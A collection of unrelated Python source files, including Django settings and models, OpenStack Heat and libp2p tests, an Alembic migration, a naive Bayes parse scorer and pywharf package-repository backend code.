# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS
FIXTURE_DIRS = (
str(APPS_DIR.path('fixtures')),
)
# EMAIL CONFIGURATION
# ------------------------------------------------------------------------------
EMAIL_BACKEND = env('DJANGO_EMAIL_BACKEND', default='django.core.mail.backends.smtp.EmailBackend')
# MANAGER CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = (
("""brett quada""", '[email protected]'),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
# DATABASE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = {
# Raises ImproperlyConfigured exception if DATABASE_URL not in os.environ
'default': env.db('DATABASE_URL', default='postgres://postgres:brett@localhost/pkg'),
}
DATABASES['default']['ATOMIC_REQUESTS'] = True
# GENERAL CONFIGURATION
# ------------------------------------------------------------------------------
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Denver'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code
LANGUAGE_CODE = 'en-us'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True
# TEMPLATE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#templates
TEMPLATES = [
{
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-TEMPLATES-BACKEND
'BACKEND': 'django.template.backends.django.DjangoTemplates',
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
'DIRS': [
str(APPS_DIR.path('templates')),
],
'OPTIONS': {
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
'debug': DEBUG,
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-loaders
# https://docs.djangoproject.com/en/dev/ref/templates/api/#loader-types
'loaders': [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
],
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
# Your stuff: custom template context processors go here
],
},
},
]
# See: http://django-crispy-forms.readthedocs.io/en/latest/install.html#template-packs
CRISPY_TEMPLATE_PACK = 'bootstrap3'
# STATIC FILE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = str(ROOT_DIR('staticfiles'))
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = (
str(APPS_DIR.path('static')),
)
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
# MEDIA CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = str(APPS_DIR('media'))
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
# URL Configuration
# ------------------------------------------------------------------------------
ROOT_URLCONF = 'config.urls'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = 'config.wsgi.application'
# AUTHENTICATION CONFIGURATION
# ------------------------------------------------------------------------------
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend',
)
# Some really nice defaults
ACCOUNT_AUTHENTICATION_METHOD = 'username'
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_EMAIL_VERIFICATION = 'mandatory'
ACCOUNT_ALLOW_REGISTRATION = env.bool('DJANGO_ACCOUNT_ALLOW_REGISTRATION', True)
ACCOUNT_ADAPTER = 'pkg.users.adapters.AccountAdapter'
SOCIALACCOUNT_ADAPTER = 'pkg.users.adapters.SocialAccountAdapter'
# Custom user app defaults
# Select the correct user model
AUTH_USER_MODEL = 'users.User'
LOGIN_REDIRECT_URL = 'users:redirect'
LOGIN_URL = 'account_login'
# SLUGLIFIER
AUTOSLUG_SLUGIFY_FUNCTION = 'slugify.slugify'
# Location of root django.contrib.admin URL, use {% url 'admin:index' %}
ADMIN_URL = r'^admin/'
# Your common stuff: Below this line define 3rd party library settings
|
py | 7dfa8bf6867e0562193b5ae29ae8a398f3c56e6f | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from cinderclient import exceptions as cinder_exceptions
from oslo_log import log as logging
import six
from tempest.lib import decorators
from heat_tempest_plugin.common import exceptions
from heat_tempest_plugin.common import test
from heat_tempest_plugin.tests.scenario import scenario_base
LOG = logging.getLogger(__name__)
@test.requires_service_feature('volume', 'backup')
class VolumeBackupRestoreIntegrationTest(scenario_base.ScenarioTestsBase):
"""Class is responsible for testing of volume backup."""
def setUp(self):
super(VolumeBackupRestoreIntegrationTest, self).setUp()
self.volume_description = 'A test volume description 123'
self.volume_size = self.conf.volume_size
def _cinder_verify(self, volume_id, expected_status='available'):
self.assertIsNotNone(volume_id)
volume = self.volume_client.volumes.get(volume_id)
self.assertIsNotNone(volume)
self.assertEqual(expected_status, volume.status)
self.assertEqual(self.volume_size, volume.size)
self.assertEqual(self.volume_description,
volume.display_description)
def _outputs_verify(self, stack, expected_status='available'):
self.assertEqual(expected_status,
self._stack_output(stack, 'status'))
self.assertEqual(six.text_type(self.volume_size),
self._stack_output(stack, 'size'))
self.assertEqual(self.volume_description,
self._stack_output(stack, 'display_description'))
def check_stack(self, stack_id, parameters):
stack = self.client.stacks.get(stack_id)
# Verify with cinder that the volume exists, with matching details
volume_id = self._stack_output(stack, 'volume_id')
self._cinder_verify(volume_id, expected_status='in-use')
# Verify the stack outputs are as expected
self._outputs_verify(stack, expected_status='in-use')
# Delete the stack and ensure a backup is created for volume_id
# but the volume itself is gone
self._stack_delete(stack_id)
self.assertRaises(cinder_exceptions.NotFound,
self.volume_client.volumes.get,
volume_id)
backups = self.volume_client.backups.list()
self.assertIsNotNone(backups)
backups_filtered = [b for b in backups if b.volume_id == volume_id]
self.assertEqual(1, len(backups_filtered))
backup = backups_filtered[0]
self.addCleanup(self.volume_client.backups.delete, backup.id)
# Now, we create another stack where the volume is created from the
# backup created by the previous stack
try:
stack_identifier2 = self.launch_stack(
template_name='test_volumes_create_from_backup.yaml',
parameters=parameters,
add_parameters={'backup_id': backup.id})
stack2 = self.client.stacks.get(stack_identifier2)
except exceptions.StackBuildErrorException:
LOG.exception("Halting test due to bug: #1382300")
return
# Verify with cinder that the volume exists, with matching details
volume_id2 = self._stack_output(stack2, 'volume_id')
self._cinder_verify(volume_id2, expected_status='in-use')
# Verify the stack outputs are as expected
self._outputs_verify(stack2, expected_status='in-use')
testfile_data = self._stack_output(stack2, 'testfile_data')
self.assertEqual('{"instance1": "Volume Data:ateststring"}',
testfile_data)
# Delete the stack and ensure the volume is gone
self._stack_delete(stack_identifier2)
self.assertRaises(cinder_exceptions.NotFound,
self.volume_client.volumes.get,
volume_id2)
@decorators.idempotent_id('c3416735-87bf-4478-85c5-b3823819eb19')
def test_cinder_volume_create_backup_restore(self):
"""Ensure the 'Snapshot' deletion policy works.
This requires a more complex test, but it tests several aspects
of the heat cinder resources:
1. Create a volume, attach it to an instance, write some data to it
2. Delete the stack, with 'Snapshot' specified, creates a backup
3. Check the snapshot has created a volume backup
4. Create a new stack, where the volume is created from the backup
5. Verify the test data written in (1) is present in the new volume
"""
parameters = {
'key_name': self.keypair_name,
'instance_type': self.conf.minimal_instance_type,
'image_id': self.conf.minimal_image_ref,
'volume_description': self.volume_description,
'timeout': self.conf.build_timeout,
'network': self.net['id']
}
# Launch stack
stack_id = self.launch_stack(
template_name='test_volumes_delete_snapshot.yaml',
parameters=parameters,
add_parameters={'volume_size': self.volume_size}
)
# Check stack
self.check_stack(stack_id, parameters)
|
py | 7dfa8cdacde0b194f51088013c19487cf0ef5e04 | from django.conf import settings
from django.db import models
from django.urls import reverse
from django.utils.translation import gettext_lazy as _
from mptt.models import MPTTModel, TreeForeignKey
class Category(MPTTModel):
"""
Category Table implimented with MPTT.
"""
name = models.CharField(
verbose_name=_("Category Name"),
help_text=_("Required and unique"),
max_length=255,
unique=True,
)
slug = models.SlugField(verbose_name=_("Category safe URL"), max_length=255, unique=True)
parent = TreeForeignKey("self", on_delete=models.CASCADE, null=True, blank=True, related_name="children")
is_active = models.BooleanField(default=True)
class MPTTMeta:
order_insertion_by = ["name"]
class Meta:
verbose_name = _("Category")
verbose_name_plural = _("Categories")
def get_absolute_url(self):
return reverse("store:category_list", args=[self.slug])
def __str__(self):
return self.name
class ProductType(models.Model):
"""
ProductType Table will provide a list of the different types
of products that are for sale.
"""
name = models.CharField(verbose_name=_("Product Name"), help_text=_("Required"), max_length=255, unique=True)
is_active = models.BooleanField(default=True)
class Meta:
verbose_name = _("Product Type")
verbose_name_plural = _("Product Types")
def __str__(self):
return self.name
class ProductSpecification(models.Model):
"""
The Product Specification Table contains product
specifiction or features for the product types.
"""
product_type = models.ForeignKey(ProductType, on_delete=models.RESTRICT)
name = models.CharField(verbose_name=_("Name"), help_text=_("Required"), max_length=255)
class Meta:
verbose_name = _("Product Specification")
verbose_name_plural = _("Product Specifications")
def __str__(self):
return self.name
class Product(models.Model):
"""
The Product table contining all product items.
"""
can_backorder = models.BooleanField(default=False)
product_type = models.ForeignKey(ProductType, on_delete=models.RESTRICT)
category = models.ForeignKey(Category, on_delete=models.RESTRICT)
title = models.CharField(
verbose_name=_("title"),
help_text=_("Required"),
max_length=255,
)
description = models.TextField(verbose_name=_("Descripción"), help_text=_("Not Required"), blank=True)
slug = models.SlugField(max_length=255)
regular_price = models.DecimalField(
verbose_name=_("Precio"),
help_text=_("Máximo 999.99"),
error_messages={
"name": {
"max_length": _("El precio debe estar entre 0 y 999.99."),
},
},
max_digits=5,
decimal_places=2,
)
inventory = models.IntegerField(default=0)
is_active = models.BooleanField(
verbose_name=_("Product visibility"),
help_text=_("Change product visibility"),
default=True,
)
featured = models.BooleanField(default=False)
created_at = models.DateTimeField(_("Created at"), auto_now_add=True, editable=False)
updated_at = models.DateTimeField(_("Updated at"), auto_now=True)
users_wishlist = models.ManyToManyField(settings.AUTH_USER_MODEL, related_name="user_wishlist", blank=True)
def remove_items_from_inventory(self, count=1, save=True):
current_inv = self.inventory
current_inv -= count
self.inventory = current_inv
if save == True:
self.save()
return self.inventory
class Meta:
ordering = ("-created_at",)
verbose_name = _("Product")
verbose_name_plural = _("Products")
def get_absolute_url(self):
return reverse("store:product_detail", args=[self.slug])
def __str__(self):
return self.title
class ProductSpecificationValue(models.Model):
"""
The Product Specification Value table holds each of the
products individual specification or bespoke features.
"""
product = models.ForeignKey(Product, on_delete=models.CASCADE)
specification = models.ForeignKey(ProductSpecification, on_delete=models.RESTRICT)
value = models.CharField(
verbose_name=_("Valor"),
help_text=_("Tipo de Producto"),
max_length=255,
)
class Meta:
verbose_name = _("Tipo de Producto")
verbose_name_plural = _("Tipos de Producto")
def __str__(self):
return self.value
class ProductImage(models.Model):
"""
The Product Image table.
"""
product = models.ForeignKey(Product, on_delete=models.CASCADE, related_name="product_image")
image = models.ImageField(upload_to='productos')
is_feature = models.BooleanField(default=False)
created_at = models.DateTimeField(auto_now_add=True, editable=False)
updated_at = models.DateTimeField(auto_now=True)
class Meta:
verbose_name = _("Imagen del Producto")
verbose_name_plural = _("Imagenes del Producto")
|
py | 7dfa8d1118e0fe11cc018ca3f3c84c3411a3a012 | """Create security tables
Revision ID: 85d881a256c0
Revises: 5818f4679595
Create Date: 2021-09-15 19:13:38.286350
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = "85d881a256c0"
down_revision = "5818f4679595"
branch_labels = None
depends_on = None
def upgrade():
op.create_table(
"security_reports",
sa.Column("id", postgresql.UUID(as_uuid=True), primary_key=True),
sa.Column("scan_id", postgresql.UUID(as_uuid=True), nullable=False),
sa.Column("product", sa.String(), nullable=False),
sa.Column("revision", sa.String(), nullable=False),
sa.Column("url", sa.String()),
sa.Column("ci", sa.Boolean, unique=False, default=False),
sa.Column("summary", postgresql.JSONB(), nullable=False),
sa.Column("created_at", sa.DateTime, default=sa.func.utc_timestamp()),
sa.Column("updated_at", sa.DateTime, onupdate=sa.func.utc_timestamp()),
sa.ForeignKeyConstraint(
["scan_id"],
["scans.id"],
),
)
op.create_table(
"security_violations",
sa.Column("id", postgresql.UUID(as_uuid=True), primary_key=True),
sa.Column("security_report_id", postgresql.UUID(as_uuid=True), nullable=False),
sa.Column("violation", sa.String(), nullable=False),
sa.Column("risk", sa.String(), nullable=False),
sa.Column("confidence", sa.String(), nullable=False),
sa.Column("solution", sa.Text()),
sa.Column("reference", sa.Text()),
sa.Column("target", sa.Text()),
sa.Column("data", postgresql.JSONB(), nullable=False),
sa.Column("tags", postgresql.JSONB(), nullable=False),
sa.Column("message", sa.Text()),
sa.Column("url", sa.String()),
sa.Column("created_at", sa.DateTime, default=sa.func.utc_timestamp()),
sa.Column("updated_at", sa.DateTime, onupdate=sa.func.utc_timestamp()),
sa.ForeignKeyConstraint(
["security_report_id"],
["security_reports.id"],
),
)
def downgrade():
op.drop_table("security_violations")
op.drop_table("security_reports")
|
py | 7dfa8dd86c3795e61bdca5e9a316d5e1dc9aef51 | import numpy as np
from . import base
class Stack(base.Reduction):
"""
Stack the features from multiple inputs.
All input matrices have to be of the same length (same number of frames).
"""
def compute(self, chunk, sampling_rate, corpus=None, utterance=None):
return np.hstack(chunk.data)
|
py | 7dfa8e43b7e2ce3227954c96d3b90bc44c711c89 | import pytest
import os
import glob
BASE_DIR = os.path.dirname(__file__)
def generate_test(filename: str):
@pytest.fixture()
def response():
return filename
return response
all_validation = [
]
for f in glob.glob(os.path.join(BASE_DIR, "*")):
_, name = f.rsplit("/", 1)
if not os.path.isfile(f):
continue
if not f.endswith("input.ll"):
continue
name = "validation_"+name.replace("-", "_").replace(".", "_")
locals()[name] = generate_test(f)
all_validation.append(name)
|
py | 7dfa8e7fa468fdf2c07eb2cab4ea7f28f7174da4 | import pytest
from libp2p.host.exceptions import ConnectionFailure
from libp2p.peer.peerinfo import PeerInfo
from libp2p.tools.factories import HostFactory, RoutedHostFactory
@pytest.mark.trio
async def test_host_routing_success():
async with RoutedHostFactory.create_batch_and_listen(2) as hosts:
# forces to use routing as no addrs are provided
await hosts[0].connect(PeerInfo(hosts[1].get_id(), []))
await hosts[1].connect(PeerInfo(hosts[0].get_id(), []))
@pytest.mark.trio
async def test_host_routing_fail():
async with RoutedHostFactory.create_batch_and_listen(
2
) as routed_hosts, HostFactory.create_batch_and_listen(1) as basic_hosts:
# routing fails because host_c does not use routing
with pytest.raises(ConnectionFailure):
await routed_hosts[0].connect(PeerInfo(basic_hosts[0].get_id(), []))
with pytest.raises(ConnectionFailure):
await routed_hosts[1].connect(PeerInfo(basic_hosts[0].get_id(), []))
|
py | 7dfa8f247ee1fa0c67adc42f04f2bc3fb839cbb8 | """Test Pure Python functionality"""
import sys
import nose
import warnings
from nose_exclude import NoseExclude
warnings.filterwarnings("ignore", category=DeprecationWarning)
if __name__ == "__main__":
argv = sys.argv[:]
argv.extend([
# Sometimes, files from Windows accessed
# from Linux cause the executable flag to be
# set, and Nose has an aversion to these
# per default.
"--exe",
"--verbose",
"--with-doctest",
"--exclude-dir=avalon/maya",
"--exclude-dir=avalon/nuke",
"--exclude-dir=avalon/houdini",
# We can expect any vendors to
# be well tested beforehand.
"--exclude-dir=avalon/vendor",
])
nose.main(argv=argv,
addplugins=[NoseExclude()])
|
py | 7dfa8f4e3ae35a6198f6637606e98f10bd9f2903 | # Copyright 2018-2020 Streamlit Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import streamlit as st
import numpy as np
img = np.repeat(0, 10000).reshape(100, 100)
st.image(img, caption="Black Square")
|
py | 7dfa8fa76b8c5b2cf6442a77a666a1dd58d6136a | """This module cointains the implementation of the scorer based on naive bayes."""
import bz2
import math
import pickle
from datetime import datetime
from typing import Sequence
from timenlp.nb_estimator import MultinomialNaiveBayes
from timenlp.count_vectorizer import CountVectorizer
from timenlp.pipeline import TimeNLPPipeline
from .scorer import Scorer
from .partial_parse import PartialParse
from .types import Artifact
class NaiveBayesScorer(Scorer):
def __init__(self, nb_model: TimeNLPPipeline) -> None:
"""Scorer based on a naive bayes estimator.
This scorer models the probability of having a correct parse, conditioned
on the sequence of rules (expressed as a categorical feature) that led to
that parse.
The score is also modified by a "length" factor that penalizes parses that
cover a smaller part of the text string.
:param nb_model:
A scikit-learn style Estimator that was trained on a corpus that takes
a Sequence[Sequence[str]] as X (each entry is a sequence of rule
identifiers) and a Sequence[int] in the set {-1, 1} that indicates if
the parse was correct or incorrect.
"""
self._model = nb_model
@classmethod
def from_model_file(cls, fname: str) -> "NaiveBayesScorer":
with bz2.open(fname, "rb") as fd:
return cls(pickle.load(fd))
def score(self, txt: str, ts: datetime, partial_parse: PartialParse) -> float:
# Penalty for partial matches
max_covered_chars = partial_parse.prod[-1].mend - partial_parse.prod[0].mstart
len_score = math.log(max_covered_chars / len(txt))
X = _feature_extractor(txt, ts, partial_parse)
pred = self._model.predict_log_proba([X])
# NOTE: the prediction is log-odds, or logit
model_score = pred[0][1] - pred[0][0]
return model_score + len_score
def score_final(
self, txt: str, ts: datetime, partial_parse: PartialParse, prod: Artifact
) -> float:
# The difference between the original score and final score is that in the
# final score, the len_score is calculated based on the length of the final
# production
len_score = math.log(len(prod) / len(txt))
X = _feature_extractor(txt, ts, partial_parse)
pred = self._model.predict_log_proba([X])
# NOTE: the prediction is log-odds, or logit
model_score = pred[0][1] - pred[0][0]
# We want the len_score to always take precedence. I believe a logit won't go up
# more than 1000. A better way would be to return an ordering tuple instead,
# but then we would need to change many interfaces.
return model_score + 1000 * len_score
def _feature_extractor(
txt: str, ts: datetime, partial_parse: PartialParse
) -> Sequence[str]:
return [str(r) for r in partial_parse.rules]
def train_naive_bayes(X: Sequence[Sequence[str]], y: Sequence[bool]) -> TimeNLPPipeline:
"""Train a naive bayes model for NaiveBayesScorer"""
y_binary = [1 if y_i else -1 for y_i in y]
# Create and train the pipeline
pipeline = TimeNLPPipeline(
CountVectorizer(ngram_range=(1, 3)), MultinomialNaiveBayes(alpha=1.0)
)
model = pipeline.fit(X, y_binary)
return model
def save_naive_bayes(model: TimeNLPPipeline, fname: str) -> None:
"""Save a naive bayes model for NaiveBayesScorer"""
# TODO: version this model and dump metadata with lots of information
with bz2.open(fname, "wb") as fd:
pickle.dump(model, fd)
|
py | 7dfa9038c491bfe3e937b206ea6b510a6d2c4341 | from abc import abstractmethod
from enum import Enum, auto
import functools
import hashlib
import importlib
import os
import pkgutil
import traceback
from typing import Callable, Dict, List, Tuple, Iterable, TypeVar, Type, Optional
import inspect
from pydantic import BaseModel
from pywharf_core.utils import (
read_toml,
write_toml,
normalize_distribution_name,
now_timestamp,
update_hash_algo_with_file,
)
####################
# Static I/O types #
####################
class LocalPaths(BaseModel):
index: str
log: str
lock: str
job: str
cache: str
def makedirs(self):
os.makedirs(self.index, exist_ok=True)
os.makedirs(self.log, exist_ok=True)
os.makedirs(self.lock, exist_ok=True)
os.makedirs(self.job, exist_ok=True)
os.makedirs(self.cache, exist_ok=True)
class UploadPackageStatus(Enum):
SUCCEEDED = auto()
CONFLICT = auto()
BAD_REQUEST = auto()
class UploadPackageResult(BaseModel):
status: UploadPackageStatus
message: str = ''
class UploadPackageContext(BaseModel):
filename: str
path: str
meta: Dict[str, str] = {}
failed: bool = False
message: str = ''
def __init__(self, **data):
super().__init__(**data)
# Fill distribution name.
if not self.meta.get('distrib'):
name = self.meta.get('name')
if name:
self.meta['distrib'] = normalize_distribution_name(name)
else:
self.failed = True
self.message = 'Cannot generate the distribution name.'
assert self.meta_distrib
# SHA256 checksum, also suggested by PEP-503.
if not self.meta.get('sha256'):
sha256_algo = hashlib.sha256()
update_hash_algo_with_file(self.path, sha256_algo)
self.meta['sha256'] = sha256_algo.hexdigest()
assert self.meta_sha256
@property
def meta_distrib(self) -> str:
return self.meta['distrib']
@property
def meta_sha256(self) -> str:
return self.meta['sha256']
class UploadIndexStatus(Enum):
SUCCEEDED = auto()
FAILED = auto()
class UploadIndexResult(BaseModel):
status: UploadIndexStatus
message: str = ''
class DownloadIndexStatus(Enum):
SUCCEEDED = auto()
FAILED = auto()
class DownloadIndexResult(BaseModel):
status: DownloadIndexStatus
message: str = ''
####################################
# Interfaces of package repository #
####################################
class PkgRepoConfig(BaseModel):
type: str
name: str
max_file_bytes: int = 1024**3
sync_index_interval: int = 60
class PkgRepoSecret(BaseModel):
type: str
name: str
raw: str
def secret_hash(self) -> str:
sha256_algo = hashlib.sha256()
sha256_algo.update(self.raw.encode())
return f'{self.name}-{sha256_algo.hexdigest()}'
class PkgRef(BaseModel):
type: str
distrib: str
package: str
ext: str
sha256: str
meta: Dict[str, str]
@abstractmethod
def auth_url(self, config: PkgRepoConfig, secret: PkgRepoSecret) -> str:
pass
class PkgRepo(BaseModel):
type: str
config: PkgRepoConfig
secret: PkgRepoSecret
local_paths: LocalPaths
@abstractmethod
def record_error(self, error_message: str) -> None:
pass
@abstractmethod
def ready(self) -> Tuple[bool, str]:
pass
@abstractmethod
def auth_read(self) -> bool:
pass
@abstractmethod
def auth_write(self) -> bool:
pass
@abstractmethod
def upload_package(self, filename: str, meta: Dict[str, str], path: str) -> UploadPackageResult:
pass
@abstractmethod
def collect_all_published_packages(self) -> List[PkgRef]:
pass
@abstractmethod
def local_index_is_up_to_date(self, path: str) -> bool:
pass
@abstractmethod
def upload_index(self, path: str) -> UploadIndexResult:
pass
@abstractmethod
def download_index(self, path: str) -> DownloadIndexResult:
pass
class BackendRegistration:
type: str = ''
pkg_repo_config_cls: Type[PkgRepoConfig] = PkgRepoConfig
pkg_repo_secret_cls: Type[PkgRepoSecret] = PkgRepoSecret
pkg_repo_cls: Type[PkgRepo] = PkgRepo
pkg_ref_cls: Type[PkgRef] = PkgRef
cli_name_to_func: Dict[str, Callable[[], int]] = {}
######################
# Backend reflection #
######################
class BackendInstanceManager:
def __init__(self) -> None:
self._type_to_registration: Dict[str, Type[BackendRegistration]] = {}
# Namespace package root.
root_module = importlib.import_module('.', 'pywharf_backends')
# Find all submodules.
for module_info in pkgutil.iter_modules(
root_module.__path__, # type: ignore
root_module.__name__ + '.',
):
# Load module.
module = importlib.import_module(module_info.name)
# Find the registration class.
registration = None
for obj in module.__dict__.values():
if inspect.isclass(obj) \
and issubclass(obj, BackendRegistration) and obj is not BackendRegistration:
registration = obj
if registration is None:
continue
# Type validation.
assert issubclass(registration, BackendRegistration)
assert registration.type
assert issubclass(registration.pkg_repo_config_cls, PkgRepoConfig) \
and registration.pkg_repo_config_cls is not PkgRepoConfig
assert issubclass(registration.pkg_repo_secret_cls, PkgRepoSecret) \
and registration.pkg_repo_secret_cls is not PkgRepoSecret
assert issubclass(registration.pkg_repo_cls, PkgRepo) \
and registration.pkg_repo_cls is not PkgRepo
assert issubclass(registration.pkg_ref_cls, PkgRef) \
and registration.pkg_ref_cls is not PkgRef
self._type_to_registration[registration.type] = registration
@property
def all_registrations(self) -> Iterable[Type[BackendRegistration]]:
return self._type_to_registration.values()
def _registration(self, **kwargs) -> Type[BackendRegistration]:
assert 'type' in kwargs
assert kwargs['type'] in self._type_to_registration
return self._type_to_registration[kwargs['type']]
def create_pkg_repo_config(self, **kwargs) -> PkgRepoConfig:
return self._registration(**kwargs).pkg_repo_config_cls(**kwargs)
def create_pkg_repo_secret(self, **kwargs) -> PkgRepoSecret:
name = kwargs.get('name')
type_ = kwargs.get('type')
if not name or not type_:
raise ValueError(f'name or type not set. kwargs={kwargs}')
raw = kwargs.get('raw')
env = kwargs.get('env')
if not raw and not env:
raise ValueError(f'Should provide raw or env. kwargs={kwargs}')
if raw and env:
raise ValueError(f'Can either set raw or env, but not both. kwargs={kwargs}')
struct = {'name': name, 'type': type_}
if raw:
# Harcoded secret.
struct['raw'] = raw
else:
# Load from the environment variable.
assert env
raw_from_env = os.getenv(env)
if not raw_from_env:
raise ValueError(f'{env} is not set. name={name}, struct={struct}')
struct['raw'] = raw_from_env
return self._registration(type=type_).pkg_repo_secret_cls(**struct)
def create_pkg_repo(self, **kwargs) -> PkgRepo:
return self._registration(**kwargs).pkg_repo_cls(**kwargs)
def create_pkg_ref(self, **kwargs) -> PkgRef:
return self._registration(**kwargs).pkg_ref_cls(**kwargs)
def load_pkg_repo_configs(self, path: str) -> Dict[str, PkgRepoConfig]:
name_to_pkg_repo_config: Dict[str, PkgRepoConfig] = {}
for name, struct in read_toml(path).items():
if not isinstance(struct, dict):
raise ValueError(f'Invalid pkg_repo_config, name={name}, struct={struct}')
name = name.lower()
config = self.create_pkg_repo_config(name=name, **struct)
name_to_pkg_repo_config[name] = config
return name_to_pkg_repo_config
@staticmethod
def dump_pkg_repo_configs(path: str, pkg_repo_configs: Iterable[PkgRepoConfig]) -> None:
dump = {}
for pkg_repo_config in pkg_repo_configs:
struct = pkg_repo_config.dict()
name = struct.pop('name')
name = name.lower()
dump[name] = struct
write_toml(path, dump)
def load_pkg_repo_secrets(self, path: str) -> Dict[str, PkgRepoSecret]:
name_to_pkg_repo_secret: Dict[str, PkgRepoSecret] = {}
for name, struct in read_toml(path).items():
if not isinstance(struct, dict):
raise ValueError(f'Invalid pkg_repo_secret, name={name}, struct={struct}')
secret = self.create_pkg_repo_secret(name=name, **struct)
name_to_pkg_repo_secret[name] = secret
return name_to_pkg_repo_secret
@staticmethod
def dump_pkg_repo_secrets(
path: str,
pkg_repo_secrets: Iterable[PkgRepoSecret],
name_to_env: Optional[Dict[str, str]] = None,
) -> None:
dump = {}
for pkg_repo_config in pkg_repo_secrets:
struct = pkg_repo_config.dict()
name = struct['name'].lower()
dump_struct = {'type': struct['type']}
if not name_to_env:
dump_struct['raw'] = struct['raw']
else:
assert name in name_to_env
dump_struct['env'] = name_to_env[name]
dump[name] = dump_struct
write_toml(path, dump)
def load_pkg_refs_and_mtime(self, path: str) -> Tuple[List[PkgRef], int]:
struct = read_toml(path)
pkg_refs = [self.create_pkg_ref(**struct_pkg_ref) for struct_pkg_ref in struct['pkgs']]
mtime = struct['mtime']
return pkg_refs, mtime
@staticmethod
def dump_pkg_refs_and_mtime(path: str, pkg_refs: Iterable[PkgRef]) -> None:
struct = {
'pkgs': [pkg_ref.dict() for pkg_ref in pkg_refs],
'mtime': now_timestamp(),
}
write_toml(path, struct)
##########
# Helper #
##########
def basic_model_get_default(basic_model_cls: BaseModel, key: str):
assert key in basic_model_cls.__fields__
return basic_model_cls.__fields__[key].default
_METHOD = TypeVar('_METHOD')
def record_error_if_raises(method: _METHOD) -> _METHOD:
@functools.wraps(method)
def decorated(self, *args, **kwargs):
try:
ret = method(self, *args, **kwargs)
return ret
except Exception:
self.record_error(traceback.format_exc())
raise
return decorated
class PkgRepoIndex:
def __init__(self, pkg_refs: List[PkgRef], mtime: int) -> None:
self._mtime = mtime
self._distrib_to_pkg_refs: Dict[str, List[PkgRef]] = {}
self._package_to_pkg_ref: Dict[str, PkgRef] = {}
for pkg_ref in pkg_refs:
self.add_pkg_ref(pkg_ref)
@property
def mtime(self) -> int:
return self._mtime
@property
def all_distributions(self) -> Iterable[str]:
return self._distrib_to_pkg_refs.keys()
def add_pkg_ref(self, pkg_ref: PkgRef) -> None:
if pkg_ref.package in self._package_to_pkg_ref:
raise KeyError(f'package={pkg_ref.package} duplicated.')
if pkg_ref.distrib not in self._distrib_to_pkg_refs:
self._distrib_to_pkg_refs[pkg_ref.distrib] = []
self._distrib_to_pkg_refs[pkg_ref.distrib].append(pkg_ref)
self._package_to_pkg_ref[pkg_ref.package] = pkg_ref
def get_pkg_refs(self, query_distrib: str) -> Optional[List[PkgRef]]:
distrib = normalize_distribution_name(query_distrib)
return self._distrib_to_pkg_refs.get(distrib)
def get_single_pkg_ref(self, query_distrib: str, query_package: str) -> Optional[PkgRef]:
pkg_ref = self._package_to_pkg_ref.get(query_package)
if pkg_ref is None or normalize_distribution_name(query_distrib) != pkg_ref.distrib:
return None
return pkg_ref
|
py | 7dfa923f723d7f2118a49f3a149e608af3cb25a0 | """
Django settings for server project.
